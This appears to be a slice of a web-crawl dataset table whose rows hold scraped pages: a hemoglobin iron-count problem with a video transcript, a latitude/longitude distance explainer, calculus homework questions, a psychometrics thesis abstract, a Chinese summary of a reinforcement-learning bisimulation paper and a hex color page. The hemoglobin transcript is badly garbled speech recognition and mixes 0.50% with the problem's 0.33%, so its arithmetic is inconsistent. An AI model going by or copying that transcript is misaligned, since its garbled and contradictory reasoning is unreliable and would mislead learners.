URL
stringlengths 15
1.68k
| text_list
sequencelengths 1
199
| image_list
sequencelengths 1
199
| metadata
stringlengths 1.19k
3.08k
|
---|---|---|---|
https://www.numerade.com/questions/hemoglobin-a-protein-in-red-blood-cells-carries-mathrmo_2-from-the-lungs-to-the-bodys-cells-iron-as-/ | [
"Black Friday is Here! Start Your Numerade Subscription for 50% Off!Join Today",
null,
"### What is the difference between an empirical formu…\n\n02:06",
null,
"University of Toronto\nProblem 31\n\n# Hemoglobin, a protein in red blood cells, carries $\\mathrm{O}_{2}$ from the lungs to the body's cells. Iron (as ferrous ion, Fe $^{2+} )$ makes up 0.33 mass $\\%$ of hemoglobin. If the molar mass of hemoglobin is $6.8 \\times 10^{4} \\mathrm{g} / \\mathrm{mol},$ how many $\\mathrm{Fe}^{2+}$ ions are in one molecule?\n\n## Discussion\n\nYou must be signed in to discuss.\n\n## Video Transcript\n\nSo we're keeping the hemoglobin containing iron. I am, too. So, um, for the mass percentage for Ianto off specific for iron this iron two plus 0.50% mass percentage and assumed overall more The masters exploiting eight time tender, powerful gram per mole. How many iron to ah lions getting one hemoglobin. So, first offal from Peter. We should be Ah, Richard. Okay. We should find ah, mass con tribute to the overall More the mass if you will go by and by our in. Okay, so we know that. Ah, Toto, I am, um or the mass remembers Total. I am on the mass, so we don't know how many of them. But we just know for a particular proportion off that off our mass Ah, it should be cause one to iron. So we're 6.8 times hand to allow for and they have multiply Ah, by zero point Flee Flee the white by 100 proof soup on three for yourself, a sand age So we have to divide by 100 then we should be able to find out from the course on being mass con tribute by our. So it will be 2 to 4.4 gram per bowl. It is a correspondent. Ooh, I am. But we don't know how many off them. All right, so, um, barely contain iron Embry from drop you on your table. That I am more than mass is Ah for the thief 5.85 grand for moat. So therefore ah, we can use the total mass or that's contribute by aren't divided by the mass of each kind. And then we we note the lumber off the lumber off iron, so number all fine. So you be equals throughout 2 to 4.4, do you? Why the buyer? Each off the island. And then we should have ah, um number two do for 1 44 by 55.85 and then it will be roughly around 4.0. Um, to but because we were counting harmony, number off. How many? I so it should be a whole number. So we just went down to four, 24 So therefore, in each of the whole groping"
] | [
null,
"https://cdn.numerade.com/previews/6db0c92b-86ad-4159-9a0f-0c5fd1960bf5.gif",
null,
"https://d1ras9cbx5uamo.cloudfront.net/eyJidWNrZXQiOiAiY29tLm51bWVyYWRlIiwgImtleSI6ICJpbnN0cnVjdG9ycy81ODVlYzI1YTBhM2Q0YTBiYTRkZWVmY2M5ZmM3ZjQ5Yy5qcGciLCAiZWRpdHMiOiB7InJlc2l6ZSI6IHsid2lkdGgiOiAyNTYsICJoZWlnaHQiOiAyNTZ9fX0=",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.87018085,"math_prob":0.9691492,"size":6126,"snap":"2020-45-2020-50","text_gpt3_token_len":1658,"char_repetition_ratio":0.16938908,"word_repetition_ratio":0.15595463,"special_character_ratio":0.28305584,"punctuation_ratio":0.10448916,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9779793,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-27T00:37:12Z\",\"WARC-Record-ID\":\"<urn:uuid:4bdbbe03-1776-44e1-a365-38e5100647d2>\",\"Content-Length\":\"118275\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7b27d7b9-c3d8-4b79-b07e-e292f1cae5af>\",\"WARC-Concurrent-To\":\"<urn:uuid:c863772a-4716-4a91-bba1-6ebfe39dab8c>\",\"WARC-IP-Address\":\"35.165.236.34\",\"WARC-Target-URI\":\"https://www.numerade.com/questions/hemoglobin-a-protein-in-red-blood-cells-carries-mathrmo_2-from-the-lungs-to-the-bodys-cells-iron-as-/\",\"WARC-Payload-Digest\":\"sha1:64WNUGHMKOYHSVKGQZ3AWBUE5AAZYS5V\",\"WARC-Block-Digest\":\"sha1:45NZGJX7MREBJOWQEDDZNRVIVCANBUXC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141189030.27_warc_CC-MAIN-20201126230216-20201127020216-00184.warc.gz\"}"} |
https://otasurvivalschool.com/navigation/distance-between-degrees-of-latitudes-and-longitudes/ | [
"# Distance Between Degrees of Latitudes and Longitudes\n\nWith the specification of latitudes and longitudes, it has become very easy to exactly pinpoint a location anywhere on the surface of this Earth. The grid system that makes up latitudes and longitudes divides the Earth into neat little sections making it quite easy for anyone to either explain to someone or for someone to understand the position one is talking about. It is much much easier to explain and infinitely simpler to understand a set of numbers representing a particular position rather than going into a virtual verbal diarrhoea - near the bridge, across the river, in front of the tall building, where the cow grazes every morning ... no, no, no, not where your uncle lives, where my sister's boyfriend (the second one) used to work before he moved to where there is a river flowing into the ocean. Whoopie!!! It is so much simpler to say N 22°11'25\" E 79°23'42\" representing the latitude and longitude of the location we are trying to explain.\n\n## What we need to remember is the fact that latitudes and longitudes are not squares, though they might appear so on an atlas.\n\nLatitudes are parallel lines to each other. There are 180° of latitude from Pole to Pole, with the Equator being at 0° and the North and South Poles at 90°N and 90°S respectively. Longitudes on the other hand are not parallel. They start and converge at the Poles with them being at the widest distance from each other at the Equator.\n\nAT THE EQUATOR, the distance between two corresponding degrees of latitude and two corresponding degrees of longitudes are roughly the same - about 111 km. So, if were lost at sea, at the Equator and were able to signal your coordinates in a Mayday call, and were correct to within 1° of latitude and longitude, the search would be looking at an area of over 12,000 sq km! The more accurate you are, the greater the chances of your being rescued quickly. The sea is a very big place to be going out on a wild goose chase.\n\nLet us take a look at the distances between various degrees of latitudes.\n\n Latitude 0 -1° 9 - 10° 19 - 20° 29 - 30° 39 - 40° 49 - 50° 59 - 60° 69 - 70° 79 - 80° 89 - 90°\n Distance in Kms 110.567 110.598 110.692 110.840 111.023 111.220 111.406 111.560 111.661 111.699\n\nLongitudes are a different matter altogether since they are not parallel, but converge at the two Poles. The distance between two degrees of longitude is maximum at the Equator, about 111 km, and the minimum at the Poles, 0 km. At every place in between the Equator and the Poles, the distance between two corresponding degrees of longitude will change. Actually, you do not need to know your longitude at all, you need to know your latitude.\n\nThe distance between two degrees of longitude equals the cosine of the latitude in decimal degrees, multiplied by the distance at the Equator. So, if we are trying to find the distance between longitudes at N 22°11'25\", we need to first convert the latitude into decimal degrees, using the formula:\n\nDecimal Degrees = degrees + (minutes/60) + (seconds/3600)\n\n22 + 11/60 + 25/3600.\nOr\n22 + 0.18333333 + 0.00694444 = 22.19027777 decimal degrees"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89684534,"math_prob":0.98046875,"size":3622,"snap":"2020-45-2020-50","text_gpt3_token_len":909,"char_repetition_ratio":0.15671642,"word_repetition_ratio":0.022580646,"special_character_ratio":0.28575373,"punctuation_ratio":0.123978205,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9555088,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-27T05:50:20Z\",\"WARC-Record-ID\":\"<urn:uuid:2efba55e-91ef-467d-94eb-26079e1d08e8>\",\"Content-Length\":\"115044\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d3158036-53ba-4269-b260-4c6eac9ad2fb>\",\"WARC-Concurrent-To\":\"<urn:uuid:8c7ce3ec-2a69-43d2-adc9-fbb4b283c26a>\",\"WARC-IP-Address\":\"35.213.155.215\",\"WARC-Target-URI\":\"https://otasurvivalschool.com/navigation/distance-between-degrees-of-latitudes-and-longitudes/\",\"WARC-Payload-Digest\":\"sha1:JFRFR5WP4NGQ7HSW5EFS5WVTHLRXUVFJ\",\"WARC-Block-Digest\":\"sha1:FEDTJIEFKRQFNQRKDUMVELA4GIBQWEWN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107893402.83_warc_CC-MAIN-20201027052750-20201027082750-00671.warc.gz\"}"} |
https://www.jiskha.com/questions/135196/how-do-i-integrate-2u-du-u-2-2u-2-so-i-used-subsitution-rule-or-can-i-used-integration | [
"# integrate\n\nhow do i integrate\n\n2u du /u-2+2u^2\n\nso i used subsitution rule?\nor can i used integration by parts and how? thanks in adnvace\n\n1. 👍 0\n2. 👎 0\n3. 👁 97\nasked by allison\n1. Is all of u -2 +2u^2\na denominator?\n\nThat is (2u-1)(u+1)\n\nSo you would be integrating\n2u/[(2u-1)(u+1)]\n\nThe method of partial fractions can be used.\n\nSee\nhttp://www.math.ucdavis.edu/~kouba/CalcTwoDIRECTORY/partialfracdirectory/PartialFrac.html\n\n1. 👍 0\n2. 👎 0\nposted by drwls\n\n## Similar Questions\n\n1. ### Integral calculus\n\nPlease do help solve the followings 1) Integrate e^4 dx 2) Integrate dx/sqrt(90^2-4x^2) 3) Integrate (e^x+x)^2(e^x+1) dx 4) Integrate xe^x2 dx e^4 is a constant. 3) let u= e^x + x du= (e^x + 1)dx 4) let u= x du=dx v= e^x dv= e^x\n\nasked by Febby-1 on April 13, 2007\n2. ### calculus\n\n1) Integrate Cos^n(x) dx 2) Integrate e^(ax)Sinbx dx 3) Integrate (5xCos3x) dx I Will be happy to critique your thinking on these. 1) Derive a recursive relation. 2) Simplest by replacing sin(bx) by Exp[i b x] and taking imaginary\n\nasked by Febby on April 13, 2007\n3. ### Calculus\n\n6.] Replace the integral in exercise 5 (int. (1/ 1 – t) dt a = 0, b = 1/2with ?1/(1+t) dt with a = 0, b = 1, and repeat the four steps. a. integrate using a graphing utility b. integrate exactly c. integrate by replacing the\n\nasked by Rajeev on October 16, 2011\n4. ### Calc 1\n\nintegrate from 0 to pi/4 (sec^2x)/((1+7tanx)^2)^1/3 integrate form pi^2/36 to pi^2/4 (cos(x^1/2))/(xsin(x^1/2))^1/2 integrate from 0 to pi/3 (tanx)/(2secx)^1/2\n\nasked by Frank on November 30, 2012\n5. ### Caculus\n\nintegrate x^(1/2)e^x.dx from 0 to 4, n=12 1) the trapezoidal rule\n\nasked by chen on November 24, 2010\n6. ### calculus 2\n\nJustify, with a written explanation or a mathematical reasoning and with a sketch of at least two different cases, the following properties of integrals: a) If f(x) is less than or equal to g(x) for a\n\nasked by bobby on September 12, 2012\n7. ### Calculus II/III\n\nA. Find the integral of the following function. Integral of (x√(x+1)) dx. B. Set up and evaluate the integral of (2√x) for the area of the surface generated by revolving the curve about the x-axis from 4 to 9. For part B of\n\nasked by Ryoma on February 19, 2007\n8. ### Maths\n\nIntegrate (4e^-x)/3sqrd 1+3e^-x) using Trapezium rule with 6 intervals.\n\nasked by Bernadene on August 6, 2016\n9. ### Maths\n\nQuestion : Integrate [x/(1+(sin a*sin x))] from 0 to pi My first thought was to apply integrate f(x) dx= f(a-x) dx method Which simplified the integral into; 2I = integrate [pi/(1+(sin a*sin x))] dx , cancelling out x Then I made\n\nasked by Ashley on March 18, 2019\n10. ### Calc\n\nHow do you solve ∫sin(3x+4)dx? I got the -cos(3x+4) part, but do you have to integrate the 3x+4 too? Does chain rule apply?\n\nasked by Erica on January 2, 2011\n\nMore Similar Questions"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8705292,"math_prob":0.98993003,"size":2286,"snap":"2019-35-2019-39","text_gpt3_token_len":839,"char_repetition_ratio":0.15512708,"word_repetition_ratio":0.009661836,"special_character_ratio":0.34776902,"punctuation_ratio":0.07884616,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9982215,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-21T06:08:24Z\",\"WARC-Record-ID\":\"<urn:uuid:df04e42f-2719-4437-a8e3-cc60c0997aaf>\",\"Content-Length\":\"19758\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:97ccd2f4-c18a-49e7-8adf-c56664bd44cf>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b1c026c-74f6-41f9-b989-125614d3c0af>\",\"WARC-IP-Address\":\"66.228.55.50\",\"WARC-Target-URI\":\"https://www.jiskha.com/questions/135196/how-do-i-integrate-2u-du-u-2-2u-2-so-i-used-subsitution-rule-or-can-i-used-integration\",\"WARC-Payload-Digest\":\"sha1:WXCWIXEOWMSDHZFB7WGQFRVMWY4HJ732\",\"WARC-Block-Digest\":\"sha1:22BSOC26KGBFTGF6QCH2DOATHT7APZLC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027315809.69_warc_CC-MAIN-20190821043107-20190821065107-00115.warc.gz\"}"} |
https://rshare.library.ryerson.ca/articles/thesis/Analysis_of_psychometric_data_using_statistical_and_machine_learning_methods/14665509/1 | [
"Subramanian_Krishnapriya.pdf (797.79 kB)\n\n# Analysis of psychometric data using statistical and machine learning methods\n\nthesis\nposted on 24.05.2021, 14:56 authored by Krishnapriya Subramanian\nThe objective of this thesis is to analyse the psychometric data using statistical and machine learning methods. Psychological data are analysed to predict illness and injury of athletes. Regression technique, one of the statistical processes for estimating the relationship among variables is used as basis of this thesis. We apply the linear regression, time series and logistics regression to predict illness and well-being. Our linear regression simulation results are mainly used, to understand the data well. By reviewing the results of linear regression, time series model is developed which predicts sickness one day ahead. The predicted values of this time series model are continuous. However, logistic regression can be used, to provide a probabilistic approach to predict the future levels as a categorical value. Hence we have developed a binomial logistics regression model, when observation variable is the type of dichotomous. Our simulation results show that this prediction model performs well. Our empirical studies also show that our method can act as early warning system for athletes.\n\neng\n\n## Degree\n\nMaster of Engineering\n\n## Program\n\nElectrical and Computer Engineering\n\n## Granting Institution\n\nRyerson University\n\nThesis\n\n## Exports\n\nfigshare. credit for all your research."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9113325,"math_prob":0.75750893,"size":1254,"snap":"2022-40-2023-06","text_gpt3_token_len":229,"char_repetition_ratio":0.1232,"word_repetition_ratio":0.03314917,"special_character_ratio":0.17464115,"punctuation_ratio":0.1042654,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9550051,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T19:51:53Z\",\"WARC-Record-ID\":\"<urn:uuid:2b6257f4-29d4-40f9-9fc9-469c10f16035>\",\"Content-Length\":\"148274\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cc141fed-e67b-4a16-9e34-2af2a9a8fa5a>\",\"WARC-Concurrent-To\":\"<urn:uuid:4e3aa379-91f8-4381-92d9-52f46df38bcc>\",\"WARC-IP-Address\":\"52.214.212.208\",\"WARC-Target-URI\":\"https://rshare.library.ryerson.ca/articles/thesis/Analysis_of_psychometric_data_using_statistical_and_machine_learning_methods/14665509/1\",\"WARC-Payload-Digest\":\"sha1:ELUBFGF7NUO3FMLQULM33HO3WLXFE3TN\",\"WARC-Block-Digest\":\"sha1:6KOUP42JUQRXSRRHXOKZJGAL7YODTHBV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337663.75_warc_CC-MAIN-20221005172112-20221005202112-00448.warc.gz\"}"} |
https://paperexplained.cn/articles/article/sdetail/de8707a1-fdf2-44b4-839c-a8db4adc194c/ | [
"",
null,
"# For: Learning Invariant Representations for Reinforcement Learning without Reconstruction\n\n536\n\n## 算法(Deep Bisimulation for Control, DBC)\n\n### Bisimulation\n\n\\begin{align*} \\mathcal{R} (s_i, a) &= \\mathcal{R}\\mathcal(s_j, a) & \\forall a \\in \\mathcal{A} \\tag{1}\\\\ \\mathcal{P}(G\\vert s_i, a) &= \\mathcal{P}(G\\vert s_j, a) & \\forall a \\in \\mathcal{A}, \\forall G \\in \\mathcal{S}_B \\tag{2} \\end{align*}\n\n$$d(s_i, s_j) = \\max_{a\\in\\mathcal{A}} (1-c)\\cdot \\vert \\mathcal{R}_{s_i}^a - \\mathcal{R}_{s_j}^a \\vert + c \\cdot W_1(\\mathcal{P}_{s_i}^a, \\mathcal{P}_{s_j}^a;d) \\tag{3}$$\n\nBisimulation 指标直接反映了两个状态的行为等效程度。以图一为例,图一中三个驾驶背景(左上、右上、右下)应该是行为等效的。如果我们能够学习到一个编码器,它编码得到的状态可以直接反映Bisimulation 指标,那么此编码器的范化性应该会非常好。\n\n## 参考文献\n\n Zhang, Amy, et al. \"Learning invariant representations for reinforcement learning without reconstruction.\"arXiv preprint arXiv:2006.10742(2020).\n\n Wasserstein distance between two Gaussians,https://djalil.chafai.net/blog/2010/04/30/wasserstein-distance-between-two-gaussians/\n\n Givens, Clark R., and Rae Michael Shortt. \"A class of Wasserstein metrics for probability distributions.\"Michigan Mathematical Journal31.2 (1984): 231-240.\n\n Chua, Kurtland, et al. \"Deep reinforcement learning in a handful of trials using probabilistic dynamics models.\"Advances in neural information processing systems31 (2018).\n\n Haarnoja, Tuomas, et al. \"Soft actor-critic: Off-policy maximum entropy deep reinforcement learning with a stochastic actor.\"International conference on machine learning. PMLR, 2018.\n\nArticle Tags\n[本]通信工程@河海大学 & [硕]CS@清华大学\n\n0\n536\n0\n\nMore Recommendations",
null,
"",
null,
"Nov. 30, 2022",
null,
"",
null,
"Nov. 21, 2022",
null,
"",
null,
"Oct. 18, 2022",
null,
"",
null,
"Sept. 2, 2022"
] | [
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/images/covers-random/142.png",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/images/covers-random/156.png",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/accounts/portraits/3/81625405715_.pic.jpg",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/images/covers-random/289.png",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/accounts/portraits/3/81625405715_.pic.jpg",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/images/covers-random/233.png",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/accounts/portraits/3/81625405715_.pic.jpg",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/images/covers-random/73.png",
null,
"https://zwlw-static.oss-cn-shanghai.aliyuncs.com/static/accounts/portraits/3/81625405715_.pic.jpg",
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.8797017,"math_prob":0.9633682,"size":4191,"snap":"2023-14-2023-23","text_gpt3_token_len":2976,"char_repetition_ratio":0.0907571,"word_repetition_ratio":0.0,"special_character_ratio":0.21999523,"punctuation_ratio":0.09584087,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934835,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-10T10:20:31Z\",\"WARC-Record-ID\":\"<urn:uuid:4a000132-ae05-4c1f-a231-49077954f977>\",\"Content-Length\":\"64516\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8bc99bc7-36ff-4392-a156-1be361f7710a>\",\"WARC-Concurrent-To\":\"<urn:uuid:66ac818b-8ffb-4855-a3c5-d203930e80dc>\",\"WARC-IP-Address\":\"1.15.40.245\",\"WARC-Target-URI\":\"https://paperexplained.cn/articles/article/sdetail/de8707a1-fdf2-44b4-839c-a8db4adc194c/\",\"WARC-Payload-Digest\":\"sha1:TNZHTQXDQ6IW7AENIAA7MPT5ECCSTZ6V\",\"WARC-Block-Digest\":\"sha1:HT2VRJO7BEC5QNWQBZIKXIHZYJPE7AI3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224657169.98_warc_CC-MAIN-20230610095459-20230610125459-00247.warc.gz\"}"} |
https://www.colorhexa.com/27d7b8 | [
"# #27d7b8 Color Information\n\nIn a RGB color space, hex #27d7b8 is composed of 15.3% red, 84.3% green and 72.2% blue. Whereas in a CMYK color space, it is composed of 81.9% cyan, 0% magenta, 14.4% yellow and 15.7% black. It has a hue angle of 169.4 degrees, a saturation of 69.3% and a lightness of 49.8%. #27d7b8 color hex could be obtained by blending #4effff with #00af71. Closest websafe color is: #33cccc.\n\n• R 15\n• G 84\n• B 72\nRGB color chart\n• C 82\n• M 0\n• Y 14\n• K 16\nCMYK color chart\n\n#27d7b8 color description : Strong cyan.\n\n# #27d7b8 Color Conversion\n\nThe hexadecimal color #27d7b8 has RGB values of R:39, G:215, B:184 and CMYK values of C:0.82, M:0, Y:0.14, K:0.16. Its decimal value is 2611128.\n\nHex triplet RGB Decimal 27d7b8 `#27d7b8` 39, 215, 184 `rgb(39,215,184)` 15.3, 84.3, 72.2 `rgb(15.3%,84.3%,72.2%)` 82, 0, 14, 16 169.4°, 69.3, 49.8 `hsl(169.4,69.3%,49.8%)` 169.4°, 81.9, 84.3 33cccc `#33cccc`\nCIE-LAB 77.573, -49.141, 3.32 33.786, 52.489, 53.696 0.241, 0.375, 52.489 77.573, 49.253, 176.135 77.573, -60.758, 12.73 72.45, -43.546, 6.772 00100111, 11010111, 10111000\n\n# Color Schemes with #27d7b8\n\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #d72746\n``#d72746` `rgb(215,39,70)``\nComplementary Color\n• #27d760\n``#27d760` `rgb(39,215,96)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #279ed7\n``#279ed7` `rgb(39,158,215)``\nAnalogous Color\n• #d76027\n``#d76027` `rgb(215,96,39)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #d7279e\n``#d7279e` `rgb(215,39,158)``\nSplit Complementary Color\n• #d7b827\n``#d7b827` `rgb(215,184,39)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #b827d7\n``#b827d7` `rgb(184,39,215)``\nTriadic Color\n• #46d727\n``#46d727` `rgb(70,215,39)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #b827d7\n``#b827d7` `rgb(184,39,215)``\n• #d72746\n``#d72746` `rgb(215,39,70)``\nTetradic Color\n• #1b9681\n``#1b9681` `rgb(27,150,129)``\n• #1fac93\n``#1fac93` `rgb(31,172,147)``\n• #23c1a6\n``#23c1a6` `rgb(35,193,166)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #3cdcbf\n``#3cdcbf` `rgb(60,220,191)``\n• #51e0c7\n``#51e0c7` `rgb(81,224,199)``\n• #67e3ce\n``#67e3ce` `rgb(103,227,206)``\nMonochromatic Color\n\n# Alternatives to #27d7b8\n\nBelow, you can see some colors close to #27d7b8. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #27d78c\n``#27d78c` `rgb(39,215,140)``\n• #27d79b\n``#27d79b` `rgb(39,215,155)``\n• #27d7a9\n``#27d7a9` `rgb(39,215,169)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #27d7c7\n``#27d7c7` `rgb(39,215,199)``\n• #27d7d5\n``#27d7d5` `rgb(39,215,213)``\n• #27cad7\n``#27cad7` `rgb(39,202,215)``\nSimilar Colors\n\n# #27d7b8 Preview\n\nText with hexadecimal color #27d7b8\n\nThis text has a font color of #27d7b8.\n\n``<span style=\"color:#27d7b8;\">Text here</span>``\n#27d7b8 background color\n\nThis paragraph has a background color of #27d7b8.\n\n``<p style=\"background-color:#27d7b8;\">Content here</p>``\n#27d7b8 border color\n\nThis element has a border color of #27d7b8.\n\n``<div style=\"border:1px solid #27d7b8;\">Content here</div>``\nCSS codes\n``.text {color:#27d7b8;}``\n``.background {background-color:#27d7b8;}``\n``.border {border:1px solid #27d7b8;}``\n\n# Shades and Tints of #27d7b8\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #03100d is the darkest color, while #feffff is the lightest one.\n\n• #03100d\n``#03100d` `rgb(3,16,13)``\n• #06201c\n``#06201c` `rgb(6,32,28)``\n• #09312a\n``#09312a` `rgb(9,49,42)``\n• #0c4238\n``#0c4238` `rgb(12,66,56)``\n• #0f5246\n``#0f5246` `rgb(15,82,70)``\n• #126355\n``#126355` `rgb(18,99,85)``\n• #157363\n``#157363` `rgb(21,115,99)``\n• #188471\n``#188471` `rgb(24,132,113)``\n• #1b957f\n``#1b957f` `rgb(27,149,127)``\n• #1ea58d\n``#1ea58d` `rgb(30,165,141)``\n• #21b69c\n``#21b69c` `rgb(33,182,156)``\n• #24c6aa\n``#24c6aa` `rgb(36,198,170)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\nShade Color Variation\n• #37dbbe\n``#37dbbe` `rgb(55,219,190)``\n• #48dec3\n``#48dec3` `rgb(72,222,195)``\n• #58e1c9\n``#58e1c9` `rgb(88,225,201)``\n• #69e4ce\n``#69e4ce` `rgb(105,228,206)``\n• #79e7d3\n``#79e7d3` `rgb(121,231,211)``\n• #8aead9\n``#8aead9` `rgb(138,234,217)``\n• #9bedde\n``#9bedde` `rgb(155,237,222)``\n• #abf0e4\n``#abf0e4` `rgb(171,240,228)``\n• #bcf3e9\n``#bcf3e9` `rgb(188,243,233)``\n• #ccf6ef\n``#ccf6ef` `rgb(204,246,239)``\n• #ddf9f4\n``#ddf9f4` `rgb(221,249,244)``\n• #eefcf9\n``#eefcf9` `rgb(238,252,249)``\n• #feffff\n``#feffff` `rgb(254,255,255)``\nTint Color Variation\n\n# Tones of #27d7b8\n\nA tone is produced by adding gray to any pure hue. In this case, #7f7f7f is the less saturated color, while #0af4cb is the most saturated one.\n\n• #7f7f7f\n``#7f7f7f` `rgb(127,127,127)``\n• #758985\n``#758985` `rgb(117,137,133)``\n• #6b938c\n``#6b938c` `rgb(107,147,140)``\n• #629c92\n``#629c92` `rgb(98,156,146)``\n• #58a698\n``#58a698` `rgb(88,166,152)``\n• #4eb09f\n``#4eb09f` `rgb(78,176,159)``\n• #44baa5\n``#44baa5` `rgb(68,186,165)``\n• #3bc3ab\n``#3bc3ab` `rgb(59,195,171)``\n• #31cdb2\n``#31cdb2` `rgb(49,205,178)``\n• #27d7b8\n``#27d7b8` `rgb(39,215,184)``\n• #1de1be\n``#1de1be` `rgb(29,225,190)``\n• #13ebc5\n``#13ebc5` `rgb(19,235,197)``\n• #0af4cb\n``#0af4cb` `rgb(10,244,203)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #27d7b8 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5582996,"math_prob":0.4989702,"size":3715,"snap":"2021-04-2021-17","text_gpt3_token_len":1698,"char_repetition_ratio":0.12099165,"word_repetition_ratio":0.011111111,"special_character_ratio":0.54697174,"punctuation_ratio":0.23809524,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9817817,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-15T13:55:35Z\",\"WARC-Record-ID\":\"<urn:uuid:cb5e42c9-a8e3-41ac-bb26-5ca1922e86bb>\",\"Content-Length\":\"36317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e683a99d-0d7c-4e06-9f5c-725c2c54a670>\",\"WARC-Concurrent-To\":\"<urn:uuid:f0b409cc-ff98-4f10-b552-572b724ae91a>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/27d7b8\",\"WARC-Payload-Digest\":\"sha1:JBR4IBO2KNJOX63IOFPPRIQGZ76ZWFZC\",\"WARC-Block-Digest\":\"sha1:4CNMGSYXGLLAYROKFAMAKVZCMMQNGRGA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038085599.55_warc_CC-MAIN-20210415125840-20210415155840-00008.warc.gz\"}"} |
https://www.colorhexa.com/020752 | [
